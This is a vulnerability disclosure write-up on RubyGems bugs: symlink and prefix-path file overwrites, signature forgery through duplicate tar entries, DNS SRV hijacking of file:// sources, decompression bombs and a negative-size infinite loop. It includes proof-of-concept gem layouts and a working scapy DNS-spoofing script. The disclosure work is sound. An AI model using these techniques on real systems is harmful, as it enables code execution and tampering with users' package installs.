David Fifield <david@bamsoftware.com>
updated
updated
updated
updated
Some security bugs in RubyGems. Nathan Malkin and I found these when we were working together in Doug Tygar's Fall 2017 CS 294-138 course on penetration testing. Our class presentation covers two of the bugs. Most of these bugs were fixed in RubyGems 2.7.6.
It's a little hard to define what counts as a "bug"
in a program like RubyGems, whose whole purpose is to
download code and execute it.
Even just gem install
can
run arbitrary malicious code
through extconf.rb. (See also.)
We therefore looked for things that were unambiguously
unexpected: for example even a malicious gem
should be safe to simply inspect, as long as you don't try to install or run it.
Here are some leads that we didn't fully pursue. They may give you some ideas if you're looking for new bugs.
RubyGems has
some kind of support
for downloading gems via Git.
However, the functionality doesn't appear to be exposed at all(?)—it
seems to need
an extension
to make it work.
But Bundler,
which is somehow integrated with RubyGems,
allows downloading from Git repositories,
and it has problems with command line sanitization.
For example, try providing --help
where Bundler expects a URL:
$ echo "gem 'rack', :git => '--help'" > Gemfile $ bundler install Fetching --help error: unknown option `bare' usage: git help [--all] [--guides] [--man | --web | --info] [<command>] -a, --all print all available commands -g, --guides print list of useful guides -m, --man show man page -w, --web show manual in web browser -i, --info show info page Retrying `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \ --bare --no-hardlinks --quiet` due to error (2/4): \ Bundler::Source::Git::GitCommandError Git error: command \ `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \ --bare --no-hardlinks --quiet` in directory /home/user/test/git has failed.error: unknown option `bare'
We couldn't find a way to get command execution.
A promising direction is setting a configuration option,
some of which control command execution,
using the
-c
option.
For example,
$ git clone -ccore.sshCommand=date 'ssh://localhost/foo' Cloning into 'foo'... /bin/date: extra operand ‘git-upload-pack '/foo'’ Try '/bin/date --help' for more information. fatal: Could not read from remote repository.
RubyGems deals with lots of gzip-compressed data.
In some contexts, it handles decompression in a streaming manner,
using Zlib::GzipReader
;
but in others, it tries to decompress completely in memory,
using Zlib::Inflate
.
This potentially makes it vulnerable to
decompression bombs.
bomb.rb outputs some highly compressed
gem files.
$ ulimit -v 1000000 $ ruby bomb.rb $ ls -lgoh bomb-10000000000.gem -rw-r--r-- 1 9.3M Nov 13 2017 bomb-10000000000.gem $ gem spec bomb-10000000000.gem /usr/lib/ruby/2.3.0/rubygems/package.rb:445:in `read': failed to allocate memory (NoMemoryError)
I tried running my own copy of the rubygems.org code, and uploading such a highly compressed gem to it. There seemed to be some kind of memory or CPU time limiter running by default, though, so it didn't seem to actually do any harm.
Gem metadata is usually stored as YAML in the file metadata.gz inside the gem tar container. But after being installed, a subset of the metadata is redundantly stored in a stub specification, a formatted comment at the top of the specifications/*.gemspec YAML file. Its purpose (I think) is to be faster to parse than the entire gemspec, for common operations where only part of the metadata is needed. Of course having two sources for the same data carries the risk that they will get out of sync. A stub specification looks like this:
# stub: tzinfo 1.2.3 ruby lib
The four parts are, in order:
name
, version
, platform
, and require_path
.
The parts are parsed by splitting on whitespace.
A strange thing happens if a gem file happens to have a version number that is an empty string (as in #270068 below): the stub will look like this:
# stub: tzinfo ruby lib
Because the stub is parsed by splitting on whitespace,
this gets misparsed as version="ruby"
, platform="lib"
.
This bug led to a crash
in all gem
commands, once a single stub with an empty
version had been installed.
The fix for the crash, though, is clearly wrong.
Here is the pre-fix code, in pseudocode:
parts = stub.split(" ") name = parts[0] version = parts[1] platform = parts[2] require_path = parts.last
The fix changes it to this:
parts = stub.split(" ") name = parts[0] if parts[1] parses as a version number: version = parts[1] else: version = "0" platform = parts[2] # BUG require_path = parts.last
They didn't shift the following assignment to account for the missing version number. It should rather be:
parts = stub.split(" ") name = parts[0] if parts[1] parses as a version number: version = parts[1] platform = parts[2] require_path = parts.last else: version = "0" platform = parts[1] require_path = parts.last
The upshot is that you end up with
platform
being set to some controllable string
(what should be treated as require_path
),
and different from what's stored in the YAML.
Users at rubygems.org are identified by both a numeric user ID and a username. For example, both of these point to the same user:
The only thing separating user IDs and usernames is their syntax: user IDs must start with a digit, and usernames must not. Throughout the code, both forms of identification are mostly interchangeable, returning results if either the user ID or the username matches. If you could subvert the username checks, and create an account with a numeric username, it would be interpreted on the server as a user ID, and you could probably gain the privileges of another user.
Update : whatever vulnerabilities that may have existed with SRV lookups disappared when SRV lookups were removed in October 2018. See RubyGems news. It turns out that file URLs were vulnerable.
The gem
command issues a DNS SRV query,
the response to which may override the URL from which
gems are downloaded.
The dodginess of the feature and the fragility of its verification
are described more here.
I could not find a serious, plausible vulnerability
in the code with respect to http or https URLs,
partly because the overridden host component
has to be a subdomain of the original domain.
But gem
also supports s3 URLs and with those
I made more progress.
The observations in this section are based on the code as of commit 7a49f405dd, .
A user who has configured an s3 source
probably has configured their .gemrc
like this:
# https://github.com/rubygems/rubygems/pull/1134 :sources: - s3://mybucket/ s3_source: { mybucket: { id: "my_id", secret: "my_secret" } }
With such a configuration,
gems will not be fetched from the default
https://rubygems.org/gems/,
but from
https://mybucket.s3.amazonaws.com/gems/.
The funny thing is, gem
will do the DNS SRV
thing even when using an s3 source.
Instead of
_rubygems._tcp.rubygems.org,
the DNS SRV query will be for
_rubygems._tcp.mybucket.
Suppose the response is not.mybucket
:
it passes the subdomain check,
and the constructed URL will be
https://not.mybucket.s3.amazonaws.com/gems/.
The not.mybucket bucket
may be owned by a completely different user (i.e., an attacker)
than the expected mybucket bucket.
On its own, this doesn't work, because there are no credentials
for not.mybucket in .gemrc
(the error message is "no key for host not.mybucket in s3_source in .gemrc").
We can work around that by providing the credentials in the URL:
the DNS SRV response should be
attackerusername:attackerpassword@not.mybucket
.
This is so, so close to being a working exploit.
There's just one problem:
the wildcard certificate for *.s3.amazonaws.com
doesn't match the double subdomain.
If you try it, gem
fails with the error
"SSL_connect returned=1 errno=0 state=error: certificate verify failed (certificate rejected)".
I tried also setting :ssl_verify_mode: 0
in .gemrc
,
but that doesn't seem to affect this particular request.
The AWS documentation
says that bucket names containing a dot don't work with HTTPS:
"When using virtual hosted–style buckets with SSL, the SSL wild card certificate only matches buckets that do not contain periods."
But that's really the only thing preventing hijacking of s3 fetches.
If gem
were ever modified to use the alternative
style of URL,
https://s3.amazonaws.com/mybucket/gems/,
it would become vulnerable.
I suspect that a sufficient fix for this is to disable the DNS SRV thing for s3 sources. s3 bucket names don't have the same ownership relationship as subdomains.
This is a fairly weak vulnerability, a limited file overwrite. It takes advantage of the code incorrectly using string prefix comparison to determine subdirectory containment. If you can convince someone to install a gem file whose name is a prefix of some other important gem file, you can overwrite that other important gem file. This vulnerability was assigned CVE-2018-1000079. It is reminiscent of, but weaker than, report #243156 by Yusuke Endoh, which could overwrite any gem file regardless of name.
There's a small bug in the report: it says that deleting an existing gem could lead to code execution. The other two things could lead to code execution, but just deleting a gem would not.
The fix
f83f911e19
went into RubyGems 2.7.6.
It just appends a '/'
before doing the string
prefix check, as we suggested.
(Maybe it would have been better to use
File::SEPARATOR
instead?)
The install_location
function allows writing to certain files
outside the installation directory.
The install_location
function in
lib/rubygems/package.rb attempts to ensure that files are not installed outside
destination_dir
.
However the test it employs, a string comparison using
start_with?
, fails to prevent the case when
destination_dir
is a prefix of the path being written.
Example that should be prevented but is allowed:
install_location '../install-whatever-foobar/hello.txt', '/tmp/install' # outputs '/tmp/install-whatever-foobar/hello.txt'
gem install
always constructs
destination_dir
as
'#{name}-#{version}'
,
so the vulnerability cannot overwrite arbitrary files.
However, a malicious gem with name='rails'
and an empty version number (version=''
),
for example, could overwrite the files of any other gem whose name begins with
rails-
, like rails-i18n or rails-letsencrypt.
The attached ra.gem demonstrates the vulnerability. It assumes that some other gems have already been installed.
gem install --install-dir=/tmp/install rails-i18n rails-letsencrypt rails-html-sanitizer gem install --install-dir=/tmp/install ra.gem
The malicious gem will do three things, each of which could potentially lead to code execution:
The structure of the gem file reveals how the attack works:
$ tar -xvf ra.gem metadata.gz data.tar.gz $ gzip -dc metadata.gz | head -n 4 --- !ruby/object:Gem::Specification name: rails version: !ruby/object:Gem::Version version: '' $ tar -tvf data.tar.gz -rw-r--r-- 0/0 12 1969-12-31 16:00 README drwxr-xr-x 0/0 0 1969-12-31 16:00 ../rails-letsencrypt-0.5.3/ -rw-r--r-- 0/0 12 1969-12-31 16:00 ../rails-i18n-5.0.4/lib/rails_i18n.rb lrw-r--r-- 0/0 0 1969-12-31 16:00 ../rails-html-sanitizer-1.0.3 -> /tmp/attacker-controlled
A sufficient fix is to append a directory separator to
destination_dir
before doing the start_with?
check.
diff --git a/lib/rubygems/package.rb b/lib/rubygems/package.rb index c36e71d8..f73f9d30 100644 --- a/lib/rubygems/package.rb +++ b/lib/rubygems/package.rb @@ -424,7 +424,7 @@ EOM destination = File.expand_path destination raise Gem::Package::PathError.new(destination, destination_dir) unless - destination.start_with? destination_dir + destination.start_with? destination_dir + '/' destination.untaint destination
ra.gem
, an example of a vulnerable gemmake-ra-gem.py
, sample code that generates the proof of concept (to run: ./make-ra-gem.py > ra.gem
)0001-Add-test_install_location_suffix.patch
, test code that checks for this vulnerability. Run with ruby -I"lib:test" test/rubygems/test_gem_package.rb
.
Using a symbolic link that points outside of the
install directory, a gem could overwrite any named file
with arbitrary contents.
It's simple to execute but powerful,
overwrite of arbitrary files as root.
But then again, if you can convince someone
to install any malicious gem file,
you can get root trivially, no symlink tricks required.
So what makes this vulnerability special?
Just that it affects even gem unpack
—even
trying to inspect the gem file is dangerous,
even if you don't install or run it.
This vulnerability was assigned
CVE-2018-1000073.
It turns out GNU tar had this exact same bug way back in 1998 (CVE-2002-1216):
tar "features" from Willy Tarreaulrwxrwxrwx willy/users 0 Sep 21 11:34 1998 include -> /etc -rw-r--r-- willy/users 758 Sep 21 11:40 1998 include/profile
The commits
1b931fc03b and
666ef793ca,
part of RubyGems 2.7.6,
attempt to fix this vulnerability.
If you ask me, the fix is unsatisfying.
It uses File::realpath
, just like the old code,
which is good as far as it goes,
but for old versions of Ruby without realpath
it just silently falls back to the old vulnerable code.
They also use string operations
(start_with?
)
to try and determine subdirectory containment,
which is exactly what led to #270068.
There may still be vulnerabilities here.
The RubyGems installer attempts to prevent a gem from writing any files outside the install directory; however it is possible to bypass the check with a symbolic link in a crafted gem.
$ tar -xvf symlink.gem metadata.gz data.tar.gz $ tar -tvf data.tar.gz -rw-r--r-- 0/0 12 1969-12-31 16:00 README lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> /tmp -rw-r--r-- 0/0 6 1969-12-31 16:00 link/HACKED
Using the attached symlink.gem
:
gem install symlink.gem # or gem unpack symlink.gem
This will create a file /tmp/HACKED.
The name and contents of the written file, as well as the file permissions, are arbitrary.
Using this technique, an attacker could easily get code execution, for example by overwriting a system binary or writing into a user's .profile
.
Note that the exploit will even work with gem unpack
, which is supposed to be safe of system-level side-effects.
For comparison, this exploit is more powerful than #243156 (and #270068) as the target directory doesn't need to contain a dash.
The code in
install_location
is supposed to check if the target filename is outside the destination directory.
It does this by fully resolving (using
File.realpath
) the destination directory and then seeing if the target filename
This test succeeds for a symlink that points outside the gem's install directory, because its "destination directory" is the directory where it's located (not where it points), which is local.
The test also succeeds for a file that uses the symlink to "escape" the local directory, because the symlink really is its prefix.
However, in combination, these files can allow for arbitrary writes, as shown.
The root cause vulnerability is the ability of symlinks to point outside the gem. This was actually forbidden in a commit from 2015, but was made more permissive in a later commit, creating this vulnerability.
The course of action we recommend is to (again) disallow symlinks that point outside the gem directory.
symlink.gem
, an example of a vulnerable gem. Note: extract this using tar
instead of gem
to avoid triggering the vulnerability (e.g., tar -Oxf symlink.gem data.tar.gz | tar -tzvf -
)make-symlink-gem.py
, sample code that generates the proof of concept (to run: ./make-symlink-gem.py > symlink.gem
)0001-Add-a-test-test_extract_symlink_parent.patch
, test code that can be added to RubyGems to test for this vulnerabilityapi_endpoint
allows URI syntax in DNS SRV responseUpdate : RubyGems removed SRV lookups in October 2018, removing this class of vulnerability. See RubyGems news. This bug report was about http and https URLs; see also the impact on s3 URLs and file URLs.
RubyGems has had a funny and little-known
feature of making a DNS SRV request
to find an alternate download server
other than the default api.rubygems.org.
As you might expect,
seeing as a local attacker can spoof SRV responses,
such as feature is hard to make secure.
Despite past vulnerabilities and resultant additional security checks,
we found news ways to mess with the address
that a client connects to,
though none that obviously leads to code execution.
The relevant piece of code has a long history of security vulnerabilities:
URI.parse "#{res.target}#{uri.path}"
Adds the feature to do a SRV lookup to check for an alternative API hostname. The stated rationale is that the feature "allows for the usage of short, simple source names (like https://rubygems.org) with specific api endpoint names, which improves load balancing." There are no security checks in this version: anyone who can spoof a SRV response and can get you to download gems from their chosen location. The feature first appears in RubyGems 2.0.
target = res.target.to_s.strip if /#{host}\z/ =~ target return URI.parse "#{uri.scheme}://#{target}#{uri.path}" end
Jonathan Claudius
reports
(HackerOne)
the DNS spoofing vulnerability, which becomes
CVE-2015-3900.
The intended fix was that the DNS reply should be restricted
to being a subdomain of the original requested domain; e.g.
"rubygems.org" is allowed to become "api.rubygems.org",
but not to become "evil.hacker.example".
The first attempt
at a fix used a regular expression,
/#{host}\z/
, to try to ensure that the
SRV response ends with the original hostname.
This change went into
RubyGems 2.4.7.
target = res.target.to_s.strip if /\.#{Regexp.quote(host)}\z/ =~ target return URI.parse "#{uri.scheme}://#{target}#{uri.path}" end
But the regular expression fix was incomplete:
not only did it allow "rubygems.org"
to become "evilrubygems.org",
it also allowed an attacker to control
regular expression metacharacters and therefore
match almost anything.
This was CVE-2015-4020.
A followup fix
changed the regular expression to /\.#{Regexp.quote(host)}\z/
,
which ensures that there's a dot before the domain,
and escapes metacharacters.
This further fix went into
RubyGems 2.4.8
in June 2015.
However, the code remained vulnerable
to a slightly modified attack.
target = res.target.to_s.strip if URI("http://" + target).host.end_with?(".#{host}") return URI.parse "#{uri.scheme}://#{target}#{uri.path}" end
Jonathan Claudius
reported a problem
with the regular expression fix.
The regular expression /\.#{Regexp.quote(host)}\z/
is fine for making sure that a hostname ends with a dot and then host
.
But the problem was that the string was not treated purely as a hostname;
it was pasted into the middle of a string that was then
parsed as a URL.
An attacker could return a string like
"evil.hacker.example/api.rubygems.org",
which would pass the check because it ends in
".rubygems.org",
but would be parsed into the URL
"https://evil.hacker.example/api.rubygems.org".
This vulnerability was
CVE-2017-0902.
The developers' reaction was to take the SRV response, parse it as a URL, extract the host component, and compare that against the expected host. The fix shipped four months later in RubyGems 2.6.13. (It was while looking at this particular fix, and the others in 2.6.13, that I realized there were likely more bugs lurking in RubyGems.)
Here is the message I sent to security@rubygems.org:
I was looking at commit
8d91516fb7037ecfb27622f605dc40245e0f8d32,
which
was the fix for the DNS hijacking issue
CVE-2017-0902.
The function
still handles the DNS response in a potentially unsafe way. I did not
find any actual vulnerabilities in the current code; the code that uses
the result of api_endpoint
(perhaps coincidentally) discards the
potentially malicious components of the URI that api_endpoint
returns.
But future code may be vulnerable. I'm sending this to the security list
because my checks for vulnerability may be incomplete.
The problem is that api_endpoint
allows the DNS SRV response to contain
URI-like syntax (which was the cause of CVE-2017-0902). The fix was to
parse the syntax as if it were a URI, extract the host component, and
only do a comparison using the host component, rather than the entire
string. However, the entire string is still pasted into the return
value, assuming the comparison succeeds. It can contain URI syntax
characters like ?
and #
that change the interpretation of what
follows them.
I'm attaching a patch that adds a new test and changes api_endpoint
to
discard everything but the host after parsing the DNS SRV response as a
URI. It would probably be even better simply to disallow any syntax
other than hostname literals.
The lines that I initially thought was vulnerable, but appear not to be, are in lib/rubygems/source.rb:
bundler_api_uri = api_uri + './api/v1/dependencies'
uri = api_uri + "#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}"
spec_path = api_uri + "#{file_name}.gz"
The reason they are not vulnerable is that api_url
is a
URI
object
rather than a string, so the
+
operator is actually the
merge
method
rather than string concatenation. The merge
operator replaces any
existing path
, query
, and fragment
components, it seems.
(It would not help if the attacker-provided string changed the URI's
host
, pass
, or
port
components, but I could not think of a realistic path to
exploitation using only those components.) However if api_uri
had been
coerced into a string, then the code would be vulnerable. An attacker
could cause the client to download some other path, which could possibly
lead to a downgrade attack or replacing one gem with another.
And the commit log for the included patch, which was lost when the report got turned into a pull request.
The api_endpoint
function inserts an untrusted string into the middle of a URI:
URI.parse "#{uri.scheme}://#{target}#{uri.path}"
The intention is that target
only replaces the host component of the URI;
for example if uri.scheme = "https"
and uri.path = "/path"
,
and target = "example.com"
, then the result will be
https://example.com/path
But target
could contain other URI syntax that masks
uri.path
. For example, if target = "example.com/badpath?query="
,
then the result will be
https://example.com/badpath?query=/path
If target = "example.com/badpath#fragment"
, then the result will be
https://example.com/badpath#fragment/path
Additionally, target = "example.com:9999"
could change the port:
https://example.com:9999/path
or target = "user:pass@example.com"
could change credentials:
https://user:pass@example.com/path
Returning a URI with an attacker-controlled path/query/fragment
is potentially dangerous if used directly
or if other URIs are created from it using string concatenation.
For example, if api_endpoint
returns "https://example.com/malicious.gz#"
,
and some other code tries to create a new URI by appending
"/good.gz"
, then the resulting URI will be https://example.com/malicious.gz#/good.gz
,
with the intended path being hidden in the fragment component of the URI.
However, I did not find any places in the code where this happens;
code that on first glance looks vulnerable:
spec_path = api_uri + "#{file_name}.gz"
is actually safe because the
+
is not string concatenation,
but the
merge
method of
URI::Generic
.
It is still possible to replace the user, password, and port,
but those do not offer an obvious path to exploitation.
Probably it's better not to parse target
as a URI at all;
rather to insist that it have the form of a hostname only.
Commit
8d91516fb7037ecfb27622f605dc40245e0f8d32
began parsing target
as a URI in order to compare the host component as a fix for
CVE-2017-0902;
however it does not discard components other than the host when building the result.
RubyGems supports developer signatures on gem files. Signatures for the various components of a gem are stored alongside them, directly inside the gem tar container. Ambiguous processing of multiple tar entries with the same filename enabled transferring any existing legitimate signature onto arbitrary contents.
It turns out that, in practice, essentially no developers actually sign their gems. A minor challenge in preparing the report was finding a gem—any gem—with a valid and current signature. Even if developers signed their gems, the default client behavior is not to verify signatures.
The fix f5042b8792 went into RubyGems 2.7.6. All it does is disallow duplicate filenames in a tar file, which seems to be sufficient. For some reason they didn't take our patch that adds tests. The fix is only partial: while it's no longer possible to attach someone else's signature to your own contents, you can still mix and match signed data and metadata files.
This vulnerability was assigned CVE-2018-1000076. Our report got us a $1000 bounty.
Inconsistencies in how gem
processes gem files make it possible to reuse a signature from an existing signed gem and apply it to arbitrary contents. The forged gem will install even with -P HighSecurity
.
The attached file multi_json-1.12.2.gem is a forged version of the genuine multi_json-1.12.2.gem gem with faked contents (just a single text file called HACKED). Here is how to check it. You must first trust the original developer's public key.
$ gem --version 2.5.2 $ wget https://raw.githubusercontent.com/intridea/multi_json/master/certs/rwz.pem $ gem cert --add rwz.pem Added '/CN=pavel/DC=pravosud/DC=com' $ gem install --install-dir install -P HighSecurity multi_json-1.12.2.gem Successfully installed multi_json-1.12.2 1 gem installed $ ls install/gems/multi_json-1.12.2/ HACKED
The vulnerability stems from inconsistencies in how gem
interprets the entries of the tar container.
A tar file may contain multiple entries with the same name.
When there are two data.tar.gz entries, for example, gem
will honor the second one when verifying the signature,
but the first one when installing files.
The proof of concept gem uses this trick:
it prepends an additional data.tar.gz entry to the genuine multi_json-1.12.2.gem.
(The attached forge-gem.sh script was used to make it.)
$ tar tvf multi_json-1.12.2.gem -r--r--r-- wheel/wheel 163 2017-10-05 16:05 data.tar.gz -r--r--r-- wheel/wheel 1840 2017-09-04 21:51 metadata.gz -r--r--r-- wheel/wheel 256 2017-09-04 21:51 metadata.gz.sig -r--r--r-- wheel/wheel 16908 2017-09-04 21:51 data.tar.gz -r--r--r-- wheel/wheel 256 2017-09-04 21:51 data.tar.gz.sig -r--r--r-- wheel/wheel 270 2017-09-04 21:51 checksums.yaml.gz -r--r--r-- wheel/wheel 256 2017-09-04 21:51 checksums.yaml.gz.sig
A similar bug affects checksums.yaml.gz: checksums are read from the first such entry, while the signature is verified on the last. This table summarizes the inconsistencies:
file | extract_files uses | verify uses |
---|---|---|
data.tar.gz | first | last |
checksums.yaml.gz | first | last |
metadata.gz | last | last |
Here are the pieces of code that are responsible for the inconsistencies in processing.
extract_files
takes the first data.tar.gz entry:
def extract_files destination_dir, pattern = "*" verify unless @spec FileUtils.mkdir_p destination_dir @gem.with_read_io do |io| reader = Gem::Package::TarReader.new io reader.each do |entry| next unless entry.full_name == 'data.tar.gz' extract_tar_gz entry, destination_dir, pattern return # ignore further entries end end end
read_checksums
seeks
to the first checksums.yaml.gz entry:
def read_checksums gem Gem.load_yaml @checksums = gem.seek 'checksums.yaml.gz' do |entry| Zlib::GzipReader.wrap entry do |gz_io| YAML.load gz_io.read end end end
verify_files
and
verify_entry
iterate over all entries in the tar file, filling in
@signatures
and @digests
.
In the case of entries with duplicate names, it overwrites previous values,
meaning that the last result wins.
verify_entry
also handles metadata.gz, calling
load_spec
afresh each time:
def verify_entry entry file_name = entry.full_name @files << file_name case file_name when /\.sig$/ then @signatures[$`] = entry.read if @security_policy return else digest entry end case file_name when /^metadata(.gz)?$/ then load_spec entry when 'data.tar.gz' then verify_gz entry end rescue => e message = "package is corrupt, exception while verifying: " + "#{e.message} (#{e.class})" raise Gem::Package::FormatError.new message, @gem end
verify_checksums
and
verify_signatures
operate only on the precomputed
@checksums
, @signatures
, and @digests
.
Incidentally,
get_metadata
,
used by the unpack
command, has its own extractor for metadata.gz,
but it happens to grab the last entry, just like verify_files
.
The attached patch 0001-Add-tests-that-Gem-Package-verify-checks-duplicate-f.patch adds two new tests (both currently failing) that check signature verification when bogus files come before or after the genuine files.
The essential mitigation is to ensure that there is no ambiguity when processing a tar file that has multiple entries for the same file name. E.g., "data.tar.gz" must refer to one and only one entry in the tar file. One way to do it would be to set a policy in the code: e.g., last entry always wins (which would be consistent with
the tar
command).
But that would be hard to enforce, especially in new code going forward.
Another way would be not to permit duplicate entries; e.g.,
verify_entry
could check whenever it is about to overwrite something in
@signatures
, @digests
, or @spec
, and return an error.
This needs some care, as metadata and metadata.gz are both processed equivalently. It is possible, using symlinks, to create entries that effectively point to the same file, even though the paths differ; e.g.:
data.tar.gz dir/ -> .. dir/data.tar.gz
But this shouldn't be a problem for gem
,
as long as it continues to use strict string equality with unadorned paths like
"data.tar.gz"
.
Even when this bug is fixed, a weaker form of signature forgery is possible. There is nothing in a gem file that binds data.tar.gz and metadata.gz together: they are signed independently. It is possible to mix and match files from different signed gems. Suppose a signed gem example-1.0 has a security vulnerability, and the authors release a new signed update example-1.1. Someone (perhaps a malicious rubygems.org admin) could forge a gem containing data.tar.gz from example-1.0 and metadata.gz from example-1.1. Users would think they are running the updated code, but they are still running the old vulnerable code. Fixing this weaker form of forgery seems like it would require a redesign of the signature format. Ideally, the signature would be over the entire gem, and verified before any unpacking.
It seems that not many people are sign their gems or verify signatures. For most users the possibility of signature forgery doesn't put them at additional risk beyond the (already risky) status quo. The flaw affects only those users who use the MediumSecurity
or HighSecurity
profiles.
How to run forge-gem.sh:
$ gem fetch multi_json $ mkdir orig $ mv multi_json-1.12.2.gem orig/ $ echo hacked > HACKED $ tar czf data.tar.gz HACKED $ ./forge-gem.sh orig/multi_json-1.12.2.gem data.tar.gz forged.gem
Be aware that if the original multi_json-1.12.2.gem and the new forged.gem are both in the same directory, then gem install ./forged.gem
will—for some reason—install multi_json-1.12.2.gem instead. You have to hide the original file in another directory first.
The bug was a parsing bug that allowed certain fields in tar files to be negative or have other weird formats, a consequence of which was that you could make some commands go into an infinite loop. This vulnerability was assigned CVE-2018-1000075. The commit 92e98bf8f8 that fixed this bug shipped in RubyGems 2.7.6.
Because Ruby doesn't have a tar package in the standard library,
a lot of other Ruby software imports Gem::Package::TarReader
in order to use RubyGems' tar-handling code
(as recommended
here,
here, and
here,
for example).
So in practice, the code is used on generic tar files,
not just specially formatted gem files.
Fixing the infinite-loop bug
caused a problem
for someone who was trying to parse a different flavor of tar files;
presumably past versions of RubyGems silently
returned garbage for certain fields in such formats,
rather than signaling an error.
The minitar library was also vulnerable.
The attached file loop.gem causes an infinite loop in any command that tries to iterate over the entries in the tar container.
gem install loop.gem gem unpack loop.gem gem specification loop.gem
Gem::Package::TarHeader.from
uses
oct
to parse fields in the tar header.
oct
does more than just parse octal digits, for example it permits these unexpected syntaxes:
"+012345".oct # 5349
"-012345".oct # -5349
"0x12abc".oct # 76476
"0b10000".oct # 16
"123,456".oct # 83
"nothing".oct # 0
The ability to encode negative values enables a DoS (infinite loop) in the tar reader.
The proof-of-concept loop.gem has a size field of -0000001000\x00
, or −512.
The negative size causes
Gem::Package::TarReader.each
to seek backwards after reading the header, so it reads the same header over and over.
I suppose one could cause a lot of CPU usage on the rubygems.org server by uploading copies of loop.gem, but I didn't try it.
Instead of doing the conversion using oct
,
there could be a special-purpose function that validates its input better.
It might be enough to check that the string matches /\A[0-7]+\z/
before calling oct
.
The attached patch file
adds a test that Gem::Package::TarHeader.from
rejects various bogus syntax.
RubyGems's DNS SRV lookup feature was questionable from a security perspective, but we did not find an actual working exploit for http and https sources, nor for s3 sources. However, for file:// sources, I did find an exploit, though it only works under a narrow set of conditions.
SRV lookups were removed in October 2018, eliminating this whole class of potential vulnerabilities.
This report was awarded a $500 bounty.
gem
makes a DNS SRV query for each of its configured sources;
the response is allowed to override the source URL in certain ways.
The SRV query happens not only for http:// and https:// sources, but also for s3:// and file://.
In the case of file://, the SRV response may add a prefix to the local filesystem path from which gems are fetched.
As a consequence, an attacker who can provide or spoof DNS responses, and can write to the local filesystem, may cause a victim to download fake gems with arbitrary contents.
Here is how an attacker may hijack a victim's installation of the minitest
gem.
The users attacker
and victim
share the same local filesystem.
victim
expects to install gems from /home/victim/trusted-gem-path,
but attacker
will force the installation to be from /tmp/attack/home/victim/trusted-gem-path instead.
First, victim
sets up a file:// repo. This could also be done by some other party, like a local administrator.
victim$ mkdir -p /home/victim/trusted-gem-path/gems victim$ (cd /home/victim/trusted-gem-path/gems && gem fetch --clear-sources --source https://rubygems.org/ minitest) victim$ gem generate_index -d /home/victim/trusted-gem-path
Then attacker
makes a malicious gem file
and installs it under a prefix where attacker
can write and victim
can read.
We'll use /tmp/attack.
# Make a malicious gem attacker$ mkdir lib attacker$ echo 'puts "hacked"' > lib/hacked.rb attacker$ cat <<EOF > hacked.gemspec Gem::Specification.new do |s| s.name = 'minitest' s.version = '5.11.3' s.files = ['lib/hacked.rb'] end EOF attacker$ gem build --force hacked.gemspec # Make it available under /tmp/attack attacker$ mkdir -p /tmp/attack/home/victim/trusted-gem-path/gems attacker$ cp minitest-5.11.3.gem /tmp/attack/home/victim/trusted-gem-path/gems attacker$ gem generate_index -d /tmp/attack/home/victim/trusted-gem-path
Next, attacker
runs a program to spoof SRV responses.
This will require root privileges if run on the same host, but it could also be done from another host in the same local network.
The attacker may even control the local DNS, for example by being the wi-fi admin.
#!/usr/bin/env python3 from scapy.all import * TARGET = b"xxx./tmp/attack" def respond(pkt): if not (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): return q = pkt[DNSQR] # Nothing after "_rubygems._tcp." indicates that the host is empty; # i.e., that it's likely a lookup for a file:// URL. 33 == SRV. if not (q.qname == b"_rubygems._tcp." and q.qtype == 33): return resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) \ / UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport) \ / DNS(qr=1, id=pkt[DNS].id, qd=q, ancount=1) \ / DNSRRSRV(type=33, rrname=q.qname, ttl=30, priority=0, weight=1, port=80, rdlen=8+len(TARGET), target=TARGET) send(resp) sniff(filter="udp dst port 53", prn=respond)
Finally, victim
tries to fetch a gem and specifically asks for their previously configured file:// source.
attacker
's SRV response adds a /tmp/attack prefix and victim
ends up with a malicious gem.
victim$ gem fetch --clear-sources --source file:///home/victim/trusted-gem-path minitest victim$ tar -O -xf minitest-5.11.3.gem -- data.tar.gz | tar tzf - lib/hacked.rb
The api_endpoint
function takes a URL, extracts the host component,
and then issues a SRV query for _rubygems._tcp.#{host}
.
Its usual purpose is to replace "rubygems.org" with "api.rubygems.org" in http:// and https:// URLs;
but it is also called for s3:// and file:// URLs.
In a typical file:// URL, the host component is empty,
so the query will be for _rubygems._tcp.
.
api_endpoint
has the property that
it allows limited control of parts of the URL other than the host component:
in particular you can add a prefix to the path component by including
/
characters in the SRV response.
The attack works by sending a SRV response of xxx./tmp/attack
.
The xxx.
can be anything, as long as it ends with a .
in order to pass the subdomain check.
Receiving such a response, api_endpoint
transforms the input URL
file:///home/victim/trusted-gem-path
into the output URL
file://xxx./tmp/attack/home/victim/trusted-gem-path
In the output URL, the xxx.
is technically the host component,
but it doesn't matter because it
is ignored.
The conditions for exploitation seem fairly narrow:
I don't know how common such conditions are.
While gem
supports file:// sources,
I wasn't able to find much information on configuring them other than
one bug report.
It seems it's more common to do a
shared repository over http
than using a shared filesystem.
Commit
37d486cfd9
says "bundler gemspecs use file:// URIs for their sources," but I could not find in Bundler where that happens.
The best solution seems to be not to call api_endpoint
for file:// (and s3://) URLs.
The host component of such URLs doesn't have the same meaning as it does in http:// and https:// URLs.
A mitigation that in this case would be sufficient would be to apply stricter validation of SRV responses, not allowing them to modify any components other than the host (GitHub #2035, HackerOne #274267).
The CVSS calculator says the severity is "high" but I would put it at "low" because of the difficulty of execution. The impact is indeed bad: arbitrary code execution using the victim's privileges, whether through Ruby code or a C extension. But as far as I can tell, the conditions for exploitation are uncommon.